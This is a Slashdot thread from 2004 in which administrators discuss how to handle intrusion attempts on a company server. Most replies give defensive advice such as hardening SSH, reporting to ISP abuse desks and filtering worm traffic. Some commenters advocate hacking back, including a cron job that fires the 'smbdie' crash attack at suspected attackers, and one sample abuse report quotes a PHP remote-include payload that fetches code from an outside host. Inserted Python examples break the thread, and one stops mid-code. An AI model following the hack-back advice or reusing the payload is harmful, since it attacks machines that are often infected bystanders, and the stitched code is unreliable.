Security

Dealing with Intruders?

drakyri asks: "I've been running a server for a small company for a few months. Recently, the number of attempted intrusions has jumped from about one every week to several per day - and these are only the really obvious attempts, like idiots who try to log in as root from the outside. The problem is that I'm not sure what to do about this. I've got their IP addresses and can usually tracert their ISPs - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"
  • Easy (Score:5, Insightful)

    by Anonymous Coward on Friday August 13, 2004 @03:33AM (#9956402)
    ignore them.

    Unless they use a lot of bandwidth, that is the right decision to make.
    • Very Easy (Score:5, Insightful)

      by kunjan1029 ( 447713 ) <email.slashdot@k u n jan.net> on Friday August 13, 2004 @03:36AM (#9956421) Homepage
      intrusion attempt >> /dev/null

      ignore it. forget it. script kiddiz...

      • Re:Very Easy (Score:5, Insightful)

        by TeVi ( 128093 ) on Friday August 13, 2004 @04:15AM (#9956570) Homepage
        (mod parent up!)

        Yup, just make sure your box is secure.

        Intrusion attempts happen unfortunately, with all the viruses, worms, etc. Just make sure your box won't get caught.

        • by CheeseTroll ( 696413 ) on Friday August 13, 2004 @11:23AM (#9959125)
          Of course you should make your box as secure as possible. Ignoring automated attack attempts is probably the wisest course of action, as well, otherwise you waste a lot of time and only draw more attention to your network, making it a bigger target.

          But for those intrusion attempts that appear to have a human being on the other end, a virtual smack upside the head would do the world some good. If it's some script kiddie, then let them know their feeble attempts do not go unnoticed, and are by no means appreciated, and chances are they'll find something more constructive to do before they get themselves into real trouble. If it's someone more hardcore, well, I guess it won't matter either way.
      • Re:Very Easy (Score:5, Insightful)

        by bstone ( 145356 ) on Friday August 13, 2004 @04:44AM (#9956647)
        Why not stop them before they get dangerous? Notify their ISP and get them a warning. Just "letting it go" will only encourage them to continue to keep on trying and learning until they figure out how to break in without being caught. A quick warning from their ISP might be just enough to scare them off, and word of mouth to their friends might help to keep others from thinking it's "cool" to attempt to break into computer systems.

        • Re:Very Easy (Score:5, Insightful)

          by Anonymous Coward on Friday August 13, 2004 @04:49AM (#9956668)
          Do as the good cops do: Arrest if there is enough evidence to lock them up, observe otherwise.

          Nothing encourages a script kiddy more than the feeling of invulnerability which you get from someone admitting that he knows what you're doing but can't do anything about it because you've not broken a law.
        • Re:Very Easy (Score:5, Informative)

          by BlackHawk-666 ( 560896 ) on Friday August 13, 2004 @05:24AM (#9956766)
          Don't bother, the real crackers are probably using some luser's box to launch the attack from. You're just warning the person who didn't secure their box, and they're not likely to understand why you are telling them they are attacking your box.
          • Re:Very Easy (Score:5, Insightful)

            by jstave ( 734089 ) on Friday August 13, 2004 @08:52AM (#9957559)
            But isn't that, right there, a good reason to let them know? If it lets someone know that their security has been compromised, they can take action to close the hole.
            • Re:Very Easy (Score:5, Insightful)

              by jhoffoss ( 73895 ) on Friday August 13, 2004 @09:36AM (#9957907) Journal
              Unless you break into each zombie manually, dezombify them, and add a readme.txt to the user's desktop, they'll never find out.

              ISPs don't really roll this information back very often, because it just takes them too long, and there's too many.

              It'd be nice if more ISPs were more responsible with this, though. Something like vlan'd users get port scanned/vuln. scanned upon connection, and once passed, they're allowed onto the big bad net. Of course then everyone on /. would complain of privacy concerns...

              • Re:Very Easy (Score:4, Insightful)

                by mustangsal66 ( 580843 ) on Friday August 13, 2004 @11:30AM (#9959208)
                Do you have any idea how clueless the average broadband user is?

                Do you have any idea the cost involved in setting up the system you have described in equipment, admin time, programmer time, etc...?

                Who's responsible for fixing the vulnerabilities once found? Who's responsible if the vuln check actually harms the users computer or data? How do you prove it?

                The ISPs are not some large benevolent entity. They're in it to make a profit. Sorry, yes, they like money. Numerous phone calls to tech support deal with questions that start, "It used to work when I had AOL." Yeah, we all know AOL sucks, but apparently they make money. Customers don't want to hear, "this isn't AOL, this is a real internet provider," they want to surf their p0rn and chatrooms. If fixing a customer will lose the customer, they're not going to do it. It's bad business sense.

                Guess who gets the cost of fixing these customers, you do as the consumer.

                Now balance it. The ISP deals with a handful of customers (out of their total subscriber base), or increases costs to all... You try to explain to grandma why her internet bill increased by 10%.
                • Re:Very Easy (Score:4, Insightful)

                  by WNight ( 23683 ) on Friday August 13, 2004 @02:36PM (#9961452) Homepage
                  "They made it more secure - the rate increase pays for the guy who runs the security"

                  Doesn't seem too hard, but maybe my grandma is smarter than yours.

                  This kind of security is well worth it. ISPs that take a few basic precautions sit back and laugh as their competitors get ravaged by the worm of the week, while zombied Windows boxes spam everyone and get the whole ISP blackholed, etc.

                  You pay one person to keep up on the script-kiddy tools and you block the ports they tend to use, or program your router to drop certain scanning packets, making it look like the computers you host are immune to the bug. Trivial stuff really.

                  If you want to get fancy you can try some sort of warning system that gives you an overview of what your users are doing. If you see that 1/3 of your users are loading a webpage at the same company you might be witnessing a DDoS attack, if one address is scanning your IP range you might want to start dropping their packets.

                  A little bit of forethought makes everything run much smoother, once you start taking precautions you'll find that despite the cost of the employee time you'll save money overall. Not in a way that short-sighted management (the type who don't understand backups and standby servers) will understand though, so you need to be at a clued company or be good at making proposals.
        • I agree! (Score:5, Interesting)

          by Mold ( 136317 ) on Friday August 13, 2004 @07:51AM (#9957211)
          Back when I was 13 or so, one of my friends had convinced me that trying something like this would be fun. I was a bit reluctant, but I had some knowledge of Unix and networking, and it did sound like fun.

          We never actually got into anything, but the next day I got an e-mail from one of the companies we had attempted to break into, politely asking me to stop. It scared the shit out of me and I never attempted anything like that again.

          And to be honest, the fact that I'd been caught and asked to stop (nicely!) impressed me far more than any of the hackers out there.
    • Re:Easy (Score:5, Insightful)

      by Phil Karn ( 14620 ) <karn.ka9q@net> on Friday August 13, 2004 @04:27AM (#9956611) Homepage
      Agreed. Just ignore them.

      These things are far too common to get worked up about, and they still consume an infinitesimal fraction of my link capacity. I long ago stopped caring about unsuccessful intrusion attempts. I only care about the successful ones, and to help prevent those I apply all the usual safeguards.

    • This is more fun! (Score:5, Informative)

      by Ch_Omega ( 532549 ) on Friday August 13, 2004 @05:35AM (#9956805) Journal
      In my opinion, Tom Hudson's [geocities.com] way of dealing with these critters is far more entertaining than just ignoring them.
      • by Ch_Omega ( 532549 ) on Friday August 13, 2004 @07:41AM (#9957171) Journal
        Seems like me posting that link, has resulted in it exceeding its allowed bandwidth. Here's the Google Cache [216.239.59.104].
      • Re:This is more fun! (Score:5, Informative)

        by nahdude812 ( 88157 ) on Friday August 13, 2004 @07:58AM (#9957246) Homepage
        A lot of these exploits are typically ancient worms that someone has managed to not clean off their computer. If it's not an ancient worm, it's probably a zombie in someone's horde.

        The problem with these two (most common) scenarios is that the person who owns the computer isn't the real perpetrator, and the ability to track the perp down requires much more work than a simple whois lookup of the offending IP.

        Most attacks you see are going to be automated and launched on a wide scale. There are thousands and thousands of compromised Windows machines out on the net that are being used by people such as spammers and crackers for their dirty work.

        Lock your box down.
        Don't allow root to log in on SSH.
        Lock SSH and other sensitive services down to specific IP address blocks if you can. If you can't, investigate port knocking [portknocking.org] if you can do that. If you can't even go that far, investigate implementing a lockout policy for failed login attempts.

        Unless you see a single host being the source of a large pile of offensive behavior, chances are these are machines in a zombie horde. If it is limited to a single IP or a few IPs in a single class C, contact the ISP's abuse department *politely* (remember these are folks like you in jobs like yours; if you go in with guns blazing, they're less likely to help) and provide as much information as you can regarding the nature of the attack. Then firewall off the offending IPs.

        I used to aggressively track intrusion attempts and spam. I had a little PHP/MySQL tool I wrote where I could log these things, dumping in offending logs (or spam source), and it'd extract the culprit IP address, and once a day go through, looking up abuse addresses on whois and mailing a digest of the day's activities for that ISP to them.

        Ultimately I probably got about a 1% response rate from the ISPs (excluding auto-responses). After ~6 months of this, and about 40,000 records in my database, I started some statistical analysis. It turns out that there were no significant outliers for abusive activity from any given ISP (considering the size of that ISP's net blocks). Basically every intrusion attempt was some kind of zombie. There were probably a few by-hand attempts, but these are typically so low profile that there's no easy way to distinguish them from the hordes.

        Some time later I was the recipient of a DDoS attack. Someone's zombie horde decided to repeatedly visit a page on my website that turns out to be a bit resource intensive to generate (my code is open source, so whoever devised this probably knew that). Every day, ~25,000 IPs each requested the same page every 4 minutes (+/- a few seconds I suppose for network latency). 375,000 hits an hour = 9,000,000 bogus hits a day. Day to day this number fluctuated, and the ISPs involved in the attack kept changing. It was obvious to me that whoever was driving the attack wasn't exposing the entire zombie horde to me at any given point because of how the ISPs involved kept shifting around. I figured he probably had a script set up to launch X number of zombies every day, and they probably had commands to execute for ~24 hours. The number was always pretty close to 25,000, never over, but usually more than 24,500.

        Ultimately the attack lasted about a month. I figured out a simple way to distinguish the zombie computers from legitimate users based on an error in the request headers, and I could just exit() at the top of my site for those who exhibited this error. I also logged the attempts I blocked, and was left with over 900,000 distinct IP addresses once the attack finally stopped.

        My point in all of that is that there *are* zombie hordes out there, and it's the zombie hordes that are most likely to compromise you. There's little you can do about it because getting a single IP from a horde firewalled off or cleaned up won't slow down your real attacker, who was going to use a different zombie the next day anyhow.
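The lockdown advice above (no root over SSH, a lockout policy for repeated failures) and the once-a-day abuse digest the poster describes, as an added Python example that is not the poster's PHP/MySQL tool: it parses constructed sshd log lines, flags a single host that exceeds a lockout threshold inside a sliding window, and groups failures by a constructed netblock-to-abuse-contact table that stands in for the whois lookup.

```python
"""Triage failed SSH logins: flag single hosts that hammer the daemon (the
lockout policy), and group the rest by ISP abuse contact for a daily digest.
Added example; the log lines and the whois table are constructed samples."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed OpenSSH auth.log excerpt (syslog format, year not logged).
SAMPLE_AUTH_LOG = """\
Aug 13 03:31:02 srv sshd[2001]: Failed password for root from 203.0.113.7 port 4021 ssh2
Aug 13 03:31:04 srv sshd[2002]: Failed password for root from 203.0.113.7 port 4022 ssh2
Aug 13 03:31:06 srv sshd[2003]: Failed password for invalid user admin from 203.0.113.7 port 4023 ssh2
Aug 13 03:31:07 srv sshd[2004]: Failed password for invalid user test from 203.0.113.7 port 4024 ssh2
Aug 13 03:31:09 srv sshd[2005]: Failed password for root from 203.0.113.7 port 4025 ssh2
Aug 13 03:40:00 srv sshd[2010]: Failed password for root from 198.51.100.20 port 5000 ssh2
Aug 13 04:15:30 srv sshd[2011]: Accepted publickey for alice from 192.0.2.9 port 51000 ssh2
Aug 13 05:02:11 srv sshd[2012]: Failed password for invalid user oracle from 198.51.100.99 port 6000 ssh2
Aug 13 05:02:40 srv sshd[2013]: Failed password for alice from 192.0.2.9 port 51010 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

# Constructed stand-in for whois: netblock -> abuse mailbox.  A real tool
# would query ARIN/RIPE/APNIC for each source address instead.
ABUSE_CONTACTS = {
    ip_network("203.0.113.0/24"): "abuse@example-isp-a.net",
    ip_network("198.51.100.0/24"): "abuse@example-isp-b.net",
}

def parse_failures(log_text, year=2004):
    """Yield (timestamp, user, ip) for every failed password line."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and other noise are not reported
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]

def lockout_candidates(failures, threshold=5, window=timedelta(minutes=10)):
    """IPs with at least `threshold` failures inside one sliding `window`:
    a single host grinding away, as opposed to one-off zombie probes."""
    by_ip = defaultdict(list)
    for ts, _user, ip in failures:
        by_ip[ip].append(ts)
    locked = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1  # drop failures that fell out of the window
            if end - start + 1 >= threshold:
                locked.add(ip)
                break
    return locked

def abuse_contact(ip):
    """Abuse address for the netblock containing `ip`, or None if unknown."""
    addr = ip_address(ip)
    for net, contact in ABUSE_CONTACTS.items():
        if addr in net:
            return contact
    return None

def build_digest(failures):
    """{contact: {ip: {count, root, first, last}}}; unknown contacts under None."""
    digest = defaultdict(dict)
    for ts, user, ip in failures:
        e = digest[abuse_contact(ip)].setdefault(
            ip, {"count": 0, "root": 0, "first": ts, "last": ts})
        e["count"] += 1
        e["root"] += int(user == "root")  # root attempts are worth calling out
        e["first"], e["last"] = min(e["first"], ts), max(e["last"], ts)
    return dict(digest)

def render_digest(digest, tz="UTC"):
    """One plain-text section per ISP; states the timezone, as advised above."""
    out = []
    for contact, ips in sorted(digest.items(), key=lambda kv: kv[0] or ""):
        if contact is None:
            continue  # nobody to send it to; keep for your own records
        out.append(f"To: {contact}")
        out.append(f"Failed SSH logins against our server (timestamps in {tz}):")
        for ip, e in sorted(ips.items()):
            out.append(f"  {ip}: {e['count']} failures ({e['root']} as root), "
                       f"{e['first']:%Y-%m-%d %H:%M:%S} to {e['last']:%H:%M:%S}")
        out.append("")
    return "\n".join(out)
```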
      • Re:This is more fun! (Score:4, Interesting)

        by Tassach ( 137772 ) on Friday August 13, 2004 @09:59AM (#9958177)
        Why waste bandwidth and CPU time sending a page back to what's most likely a worm-infected machine? The default 404 response is more than adequate. His RedirectMatch hack is pretty good, but you can use the same regexps in SetEnvIf rules:
        #regexp rules to set environment variables
        SetEnvIf Request_URI "(regexp1)" ATTACK
        SetEnvIf Request_URI "(regexp2)" ATTACK
        ...

        # Anything that matches a worm/virus attack pattern goes in a special log
        CustomLog logs/attack_log common env=ATTACK

        # Everything that's not an attack goes on the normal log
        CustomLog logs/access_log common env=!ATTACK
        This puts all the zombie/worm attacks into a separate log file. This also allows me to have logrotate truncate the attack_log and the access_log on different schedules.
        • Re:This is more fun! (Score:4, Interesting)

          by Tassach ( 137772 ) on Friday August 13, 2004 @10:04AM (#9958220)
          Oops... forgot the most important part:
          <Location />
          Order Allow,Deny
          Allow from all
          Deny from env=ATTACK
          ErrorDocument 403 "Worm Attack Suspected - Access Denied
          </Location>
          You could replace the errordocument with a PHP or CGI to send back a page of shame instead of static text, but why bother?
  • DMCA (Score:5, Funny)

    by Amiga Lover ( 708890 ) on Friday August 13, 2004 @03:33AM (#9956408)
    Use the DMCA to... I don't know, scare them or something. Mention RIAA and MPAA to their ISPs too.
  • by robogun ( 466062 ) on Friday August 13, 2004 @03:34AM (#9956411)
    I haven't seen any similar increase in activity. Does your firm have enemies? For instance, does your first name rhyme with Carl?
  • Abuse@ (Score:5, Informative)

    by craigske ( 106369 ) on Friday August 13, 2004 @03:35AM (#9956413) Homepage
    The accepted way is to send an email to abuse@ or to the abuse contact listed by ARIN for the netblock you are trying to lart.

    http://www.arin.net
    or lookup the RADB abuse contact
    http://www.dnsstuff.org
    • Be sure though to include *all* relevant log files too. I've sent a couple of mails in the past to ISPs and I think I got a response from about 50% of the ISPs contacted, from which only one responded once by saying they contacted the individual and took appropriate actions ... whatever that may mean.

      You'd be better off configuring your security better though.
  • Create a honeypot (Score:5, Insightful)

    by JVert ( 578547 ) <corganbilly@hotmai[ ]om ['l.c' in gap]> on Friday August 13, 2004 @03:35AM (#9956415) Journal
    If you seem to be getting it from the same group of people, make a honeypot but have some obvious hints once they get in; leave very little on the server and put the logs of their activity in an obvious place. Just be sure to isolate that machine from the rest of the network so if they do end up owning it they got no further than their failed attempt at your real machines.
    • Re:Create a honeypot (Score:5, Interesting)

      by welshwaterloo ( 740554 ) on Friday August 13, 2004 @04:16AM (#9956577)
      IMHO - If you're not completely sure your network is 101% secure, or you don't have several free hours a day it would be a bad idea to drop a honeypot anywhere near your network.

      Think about it - it's a slap in the face to the would-be hacker.. It's like you're leading him on, then saying "Ner Ner!" when he breaks into the pot.
      If your hacker is serious, he's gonna be really pissed about this.

      Secure your network & keep it secure - no need to stir 'em up.
      • Re:Create a honeypot (Score:3, Interesting)

        by ayjay29 ( 144994 )
        I agree with the above. Also creating a honeypot will give these guys something to play with, something fun to do, which will mean they will be more likely to come back.

        If they can't get anywhere, they will move on somewhere else...

  • by angryLNX ( 679691 ) on Friday August 13, 2004 @03:35AM (#9956417) Homepage
    Who'd have thought! [slashdot.org]
  • by Anonymous Coward on Friday August 13, 2004 @03:36AM (#9956418)
    on my University's network more than once. I ran Linux and I got into the habit of logging in as root, and sometimes I'd try to log in without thinking just after starting a telnet session. I didn't receive any notice from the U, but in this post-9/11 hellmouth, I'm sure I'd have been reported to the FBI as a potential terrorist.
  • Abuse (Score:5, Insightful)

    by martingunnarsson ( 590268 ) * <martin&snarl-up,com> on Friday August 13, 2004 @03:36AM (#9956419) Homepage
    When I had this problem I simply sent a mail to the ISP's abuse people. Most ISPs have an e-mail address like abuse@theisp.com. Then they can send the guy a warning or whatever.
  • by Mal-2 ( 675116 ) on Friday August 13, 2004 @03:38AM (#9956428) Homepage Journal
    If you give them a more attractive target for a while, you may find there really aren't all that many attackers left to go after the systems that matter. Not only that, but it would be considerably easier to set up such a system to log their attack techniques, since it isn't actually doing anything. Finally, if they do break through, who cares? Just re-image the drive and let them start over. If they manage to repeat it, you now have a known weakness you can correct.

    Mal-2
  • My Advice (Score:3, Informative)

    by momogasuki ( 790667 ) on Friday August 13, 2004 @03:40AM (#9956435)
    Just ignore them. Focus on keeping your server software up to date and staying informed of possible security issues instead of wasting time trying to track down intrusion attempts.
  • Snort + Guardian (Score:4, Informative)

    by UltiSkeeter ( 663903 ) on Friday August 13, 2004 @03:40AM (#9956436)
    These two will detect most automatic attempts and then add the IPs to a drop list on your Linux firewall. www.snort.org. Guardian is listed under 'other tools'.
    • Re:Snort + Guardian (Score:3, Interesting)

      by Umrick ( 151871 )
      We ran this configuration for about 3 months. The problem is the sheer number of false positives by the default snort rules. If you can't spend the time trimming down the ruleset to the bare minimum to cover your needs, you will be locking out end users.

      Classic for us was one user who had multiple domains with us got blocked every time she went to view one of her pages. Turns out the snort rule was so generic it was just looking for /calendar, so anything containing that would get trashed.

      In the general se
  • by AngstAndGuitar ( 732149 ) on Friday August 13, 2004 @03:40AM (#9956439)
    You might consider sending a handwritten letter and using your own name; that would seem a bit more human. Also, most large companies will send polite-but-firm letters, so just threaten bodily harm to them and their pets, that should sound pretty un-corporate. I suppose only the first suggestion is really a good one, but I like the second one more, so I'm not going to remove it from my comment.
  • Well... (Score:5, Informative)

    by MrWorf ( 216691 ) on Friday August 13, 2004 @03:42AM (#9956450) Homepage
    I always write a really "nice" letter to the ISP of the intruder, where I explain the problem, and that it is causing my customers trouble and that it eats up valuable bandwidth. I ask them to take action, and if not, that I'll have to proceed further (never been needed once). I send the email from the admin account, sign it with my name + admin at my system and then I attach the logs pertaining to the intrusion attempt.

    So far, all of these "cease and desist" letters have resulted in action on the ISP's part, and in 50% of the cases, their admins write me back and give me feedback on the problem.

    Of course, I don't do this for every attempt (all depending on my mood ... at least nowadays), mostly for the more serious attempts (doing multiple attempts, different attempts, etc).

    The worst (or craziest?) attempt yet was by some nut who portscanned the system, port by port from start to finish. I actually managed to get hold of the owner of the computer system that was scanning me and phoned him. Quite a hilarious experience. Needless to say, the portscanning stopped :)
    • Re:Well... (Score:4, Informative)

      by zoom ( 38906 ) on Friday August 13, 2004 @04:25AM (#9956605)
      I've had similar experiences. I've noticed several SSH attempts on my server recently - just a personal server at home. I've written to the abuse addresses found by running WHOIS and politely informed the ISP that there was an intrusion attempt and could they please inform the user that we are not a public service.
      Many times the ISP has responded and usually their customer has a zombie box.
      Always include a log if possible so they know the time and the IP-address. Remember to tell them what timezone the timestamps are from.
      WHOIS links:
      http://ws.arin.net/cgi-bin/whois.pl
      http://www.ripe.net/db/whois/whois.html
      http://www.apnic.net/apnic-bin/whois.pl
  • In my experience (Score:4, Informative)

    by Howzer ( 580315 ) * <grabshot&hotmail,com> on Friday August 13, 2004 @03:43AM (#9956459) Homepage Journal
    In my admittedly limited experience, having been a "web manager" for half a dozen websites or so in my time, this sort of stuff was seasonal (highs in summer and winter when the script kiddies were indoors) and never used to particularly bother me.

    I had confidence in my setup, and no server I had control over was, to my knowledge, ever compromised.

    We never had any sensitive data outside the firewall, anyway.

    On two occasions it got serious (if an easily beaten DOS attack can be called serious) and even then it was only for 20 minutes or so. Our ISP (being a large telecom) was champing at the bit to go after people we had even a small scrap of evidence against, so on those two occasions we simply handed what information we'd gleaned to them, and they let out the dogs.

    At some stage, you've got to stop worrying and learn how to love the internet!

  • by arcade ( 16638 ) on Friday August 13, 2004 @03:46AM (#9956469) Homepage
    Personally I tend to ignore the scans for ssh and so forth, as they're just SYN packets and don't consume too much of my resources. Call me a lazy/non-caring bastard. However, it would surely be nice to send off a message to the ISP, as the machines the scans are originating from are probably cracked too.

    I tend to report viruses. I grep my logs daily for viruses from various Norwegian ISPs, to the mailserver I admin for my company. During the last five months I've sent daily virus reports to the largest ISP in Norway, and they tend to reply within one business day - having notified their customer about the infection. If the customer gets several 'heads up' messages from the ISP without removing the virus, they get their port 25 access filtered until they've confirmed that they've removed the virus.

    I tend to send emails such as this.

    "
    Hi there.

    I've got several viruses from your customers today, and would appreciate it if you could notify your customers about the virus infections they probably have.

    Here are the relevant snippets from my logs:

    Virus: Netsky.B
    Received: from at

    Virus: Bagle.C
    Received: from at

    All timestamps on the server are NTP-sync'ed against .

    Thanks for your time
    "

    Recently I've also included a more personalized

    "Oh, and I have to commend your ISP's efficiency, as since March - you've managed to reduce the number of virus sending users to us from about per day, to this .. it's days since the last virus from you! Keep up the good work!"

    You could probably just adapt what I'm writing to something saying that a customer of theirs probably has been cracked, and that they are currently scanning for .. and so forth.

    If it's the actual cracker that's stupid enough to use his own computer, he'll get scared enough if they contact him telling him that his computer has been abused by others to scan people -- and will probably quit doing it. :)


    • Damn, you must have a lot of time on your hands..

      We actively block viruses at the mail server, and our logs show over 20k came towards us yesterday. Want to parse my logs and report the infected machines? :)

      And yes, we don't send the automagic "We received a virus" notices. Those are just plain annoying considering most headers are faked.

      • Damn, you must have a lot of time on your hands..

        Nah. We only get around 50 viruses per day, and I've made a list of the responsive ISPs. I tend to email the responsive ISPs one email per day, containing nothing but the relevant headers.

        The ISPs just receive an email with the name of the virus, and the Received: from header(s) they need to track down the person with that virus.

        Most is automatically generated by my scripts. I just paste it into my mail client and send it off with a few nice words on
    • More good advice ... (Score:3, Informative)

      by zonix ( 592337 )

      This is really good advice, but you can do more. :-)

      Most ISPs really appreciate the complete header of the mail, and sometimes even the body in case of spam. First of all it adds to the authenticity, and second they'll be able to forward your complaint to the responsible ISPs if you had too much beer while reading a spoofed header (more so for spam than virus mails). Some ISPs are quite helpful in this regard.

      To aid in identifying the correct abuse addresses I can recommend the hinfo utility as a compleme

  • by Anonymous Coward on Friday August 13, 2004 @03:46AM (#9956472)
    Nothing beats the personal touch of hired goons...
  • by cbdavis ( 114685 ) on Friday August 13, 2004 @03:46AM (#9956473)
    or you'll spend half your time at work writing abuse letters. My logs at work show a constant barrage of Windows attacks (yes, Code Red is still there), 137 scans, numerous login hacks for any number of OSes, port scans that increment by 1 each time, etc. Sometimes it slows down. I am beginning to just consider it background noise. Just the cost of doing business on the web. As long as the probes aren't massive or working, I just note and ignore. I only have so much time for this - it keeps me from downloading all that porn!
  • Ignore it? (Score:5, Informative)

    by Inominate ( 412637 ) on Friday August 13, 2004 @03:47AM (#9956475)
    This kind of stuff is all over the place. Odds are most of these are automated worms and similar crap. Unless it's really a concerted attack on your machines, as opposed to random scanning, it's not worth the effort to do anything about it except maybe firewall the IP.
  • by astrashe ( 7452 ) on Friday August 13, 2004 @03:47AM (#9956476) Journal
    I don't understand why you'd care how you come off to the people trying to crack into your system.

    They're out to do you harm. If one of them gets through and does some damage, you could lose your job.

  • by teamhasnoi ( 554944 ) <teamhasnoi AT yahoo DOT com> on Friday August 13, 2004 @03:49AM (#9956485) Journal
    Just don't tell my mom! She'll take away my Compaq, or make me install SP2!
  • by dan dan the dna man ( 461768 ) on Friday August 13, 2004 @03:58AM (#9956511) Homepage Journal
    From a server in Brasil yesterday. I never bother reporting these things normally, but the compromised machine (i.e. the one originating the attack) was a webserver and had some "info@" addresses. I wrote, apologising for my lack of Portuguese, and an hour later had a very grateful email from the sysadmin. This is going to encourage me to report them in future.


    Basically I just gave a quick digest of the log clearly showing their IP and the attack in progress, and a note to the effect that I believed their machine had been compromised (in as plain English as I could muster) - and got the desired result.


    I like the fact that there's some script kiddie out there cursing that one of his "boxen" is no longer.. ;)

  • by Monkelectric ( 546685 ) <[moc.cirtceleknom] [ta] [todhsals]> on Friday August 13, 2004 @04:00AM (#9956521)
    True story: About 8 years ago some friends and I were getting o3ned DAILY by a hacker. One of these friends had a buddy in IBM's security division, who somehow got us a name and phone # of our hacker. We felt like asses when we found out we were getting beat down by a 15-year-old. But we called his dad, explained what was going on, and that we knew where he lived. Problem SOLVED :)
  • by ComputerizedYoga ( 466024 ) on Friday August 13, 2004 @04:04AM (#9956532) Homepage
    mid july or so there were a bunch of random automated-looking and weak looking ssh login attempts all over the place ....

    threads on the full disclosure mailing list archives [netsys.com] and dslreports forums [dslreports.com] about that ....

    wonder if this is what the topic poster was encountering?
  • by BrynM ( 217883 ) * on Friday August 13, 2004 @04:13AM (#9956562) Homepage Journal
    Please note that this is ineffectual to send to some ISPs. You won't always get a response. Look everything up first! Go look up who owns an IP at ARIN [arin.net] and who has registered domain names at a lot of different places [google.com]. Think hard before you send unless you write something automated - you may not want to send anything to someone who is actually the kiddie that attacked you. The result of that mistake is annoying. Trust me.

    Due to abuse, the following IP address(s) have been banned from accessing
    mydomain.com and its associated services. The abuse is detailed as
    follows:

    IP(s) Banned: 216.nnn.225.nn

    Owner:
    OrgName: SOME ISP
    Address: 2 Hacker Home Street
    City: Isabel
    StateProv: CA
    PostalCode: 01120
    Country: US
    Admin Address: noc@someisp.net

    Reason:
    Malformed URL - Attempted PHP Exploit
    "216.nnn.225.nn - - [11/Aug/2004:10:03:03 -0700] "GET
    /themes/default/theme.php?THEME_DIR=http://www.evil-hacker.
    net/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352"

    Severity: 5

    Remaining bans until entire address block banned: 3

    If you have any questions or need further explanation, please contact
    admin@mydomain.com.

    You
    Your Title
    Your Contact Info
  • Firewall? (Score:3, Interesting)

    by vandan ( 151516 ) on Friday August 13, 2004 @04:16AM (#9956574) Homepage
    Complaining to people won't get you anywhere, unless you go to the government and claim that you believe they are terrorists. That will get you some action.

    My advice is to firewall them.

    Personally I also try giving them a taste of their own medicine. You'd be surprised how many Windows machines are still vulnerable to the old 'smbdie'. I set up a cron job to 'smbdie' all hackers / spammers etc every 5 minutes. But of course this is horrible advice because ( and I'm sure everyone will respond and tell you that it's very naughty to fight fire with fire, and you will most likely go blind or some bullshit. )

    So yeah. Firewall them. And if you've got time, email their ISP and tell them that you've firewalled them and if you have any complaints from customers about them not being able to access your server, that you will advise them that their ISP is harbouring hackers and that they should switch ISPs.
  • by Numen ( 244707 ) on Friday August 13, 2004 @04:18AM (#9956579)
    Whatever they're doing to you have a go back at them... chances are their system isn't as secure as yours.

    At the very least it's more fun than writing an e-mail!
  • by phek ( 791955 ) on Friday August 13, 2004 @04:22AM (#9956596)
    It's really normal to notice a huge increase in attacks this time of year. With the passing of DEF CON and Black Hat this month, a lot of new security vulnerabilities have been released, and all of the 'script kiddies' are eager to try them out. The best thing to do is make sure all your software is up to date, and get familiar with the new vulnerabilities that are out so you can protect yourself.

    As far as reporting them, you could try all day and not be able to report all of them, and even if you did, they're most likely attacking from someone else's vulnerable machine. The only thing you can really do is watch out for anyone who's aggressively attacking you (i.e. one person who's running lots of attacks on you trying desperately to break into your machine at any cost), and report those ones, or if you can find a way to contact that person, tell them to stop before you report them to their ISP and/or authorities; this will usually scare most people off.

    Once you do start paying some decent attention to security releases, a lot of these stupid things people try won't surprise you, like the ssh root attempt is because some tool came out recently that just scans netblocks for anyone running ssh and tries logging in as two different users with no password, root being one of them. If you're not familiar with where to find security releases, here's some good places to start:

    packetstorm security [packetstormsecurity.org]
    Security Focus [securityfocus.com]
  • Somewhat offtopic, but how do people deal with DOS attacks?
    I've had a person harassing the forums at a website that I host.
    I banned by IP and then he started using proxies,
    so I had to write a script to ban his IP each time he logged in,
    of course then he started creating new accounts;
    so I had to change the forum registration to one account per unique email address.
    And then he tried to DOS the site by visiting the site and locking down his F5 key.
    (He actually confessed this to me in IRC; he had 4 other people do this with him.)
    I sent Comcast (his ISP) the IRC logs & the network monitor logs.
    They sent me a generic response saying "blah blah blah.. this is an automated response".
    And that's it.
    So how do other /.ers deal with situations like this?
    It's a personal website, and I don't have the funds to hire a lawyer.
    I've banned his IP and ~6000 proxy IPs, but he still keeps getting through.
    • by Vo0k ( 760020 ) on Friday August 13, 2004 @04:57AM (#9956689) Journal
      Look up HTB on the net (Heuristic Token Bucket) - a firewall rule that limits network abuse while not obstructing normal network usage - every IP gets a pool of "tokens". One token is removed from the pool when a packet is sent, packets won't be sent as long as the pool is empty, but it gets refilled at a constant, slow rate, until it's "full" again. So a user can download, say, 500K in one rapid burst at maximum network capacity, then his connection bandwidth goes down to some 5K. If he waits 100s he will be able to get 500K in a similar burst again. This way, one page loads really fast. User reads the page, goes back, loads another one (a minute later) very fast again. A loser who keeps reloading exceeds his 500K bucket content in 2-3 reloads and then gets a constant drip of 5K upstream, hardly disturbing the others.
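      The per-IP token bucket the comment describes, as an added example that is not from the comment and not the Linux HTB qdisc itself: a simplified model using the comment's numbers (500K burst, 5K/s refill, 100 s to refill), with constructed client addresses and page sizes.

```python
class TokenBucket:
    """One bucket per client IP: `capacity` bytes of burst, refilled at `rate`
    bytes per second. With 500K and 5K/s the bucket takes 100 s to refill,
    the numbers used in the comment above."""

    def __init__(self, capacity, rate):
        self.capacity = float(capacity)
        self.rate = float(rate)
        self.tokens = self.capacity   # a new client starts with a full bucket
        self.last = 0.0               # time of the last update, in seconds

    def request(self, nbytes, now):
        """Charge `nbytes` and return how many seconds the transfer has to be
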